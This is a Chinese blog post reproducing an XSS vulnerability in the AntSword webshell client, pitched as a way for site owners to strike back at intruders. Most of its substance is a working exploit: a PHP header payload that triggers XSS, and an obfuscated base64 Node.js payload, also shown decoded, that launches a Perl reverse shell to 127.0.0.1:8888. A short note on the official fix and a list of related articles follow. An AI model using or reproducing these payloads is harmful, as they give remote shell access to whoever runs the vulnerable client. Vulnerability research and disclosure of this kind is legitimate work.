中国蚁剑xss漏洞复现
2019-05-31 19:50
260 查看
中国蚁剑xss漏洞
漏洞成因:
当连接webshell失败时,会在中国蚁剑客户端会返回错误信息,但是由于没有对数据进行处理,使用的是html解析,导致xss,然后可以利用js调用perl便可反弹攻击者的shell。
漏洞复现:
当你的web站点被人getshell时,你可以尝试修改其webshell,利用该漏洞进而进行取证等操作。
xss漏洞触发:
<?php header('HTTP/1.1 500 <img src=1 onerror=alert(1)>');
需要注意的是,只有当蚁剑客户端连接失败的时候才会触发该xss漏洞。比如你可以通过修改其一句话木马的密码导致其连接失败从而导致该xss漏洞触发。
利用该xss漏洞反弹shell:
exp:
<?php header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTg4ODg7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>"); ?>
base64_decode code
require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
成功反弹入侵者shell:
官方修复方案:
为了防止插件中 toastr 出现类似问题, 修改了 toastr 可以输出 html 的特点,以后均不支持输出 html。
参考链接:
相关文章推荐
- PHP漏洞XSS的介绍和预防策略
- XSS漏洞分析
- XSS漏洞实例利用
- 今天项目中出现了一个xss漏洞
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
- JSP过滤器防止Xss漏洞
- 案例分析---我是如何在谷歌财经发现一个XSS漏洞
- XSS攻击:SOHU视频XSS漏洞导致其用户成为DDOS肉鸡
- 利用xss漏洞窃取cookie登录
- Web应用进行XSS漏洞测试(引用)
- Discuz x2 XSS漏洞
- WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析
- XSS--PHPwind5.3复现
- 基于DOM的XSS注入漏洞简单解析
- MS Office 漏洞CVE-2017-8759复现
- Discuz!X 前台任意文件删除漏洞复现测试
- 利用XSS注入漏洞能对网站做什么
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- 如何测试XSS漏洞 [ 光影人像 东海陈光剑 的博客 ]
- php检查漏洞防护补丁-防护XSS,SQL,文件包含等多种高危漏洞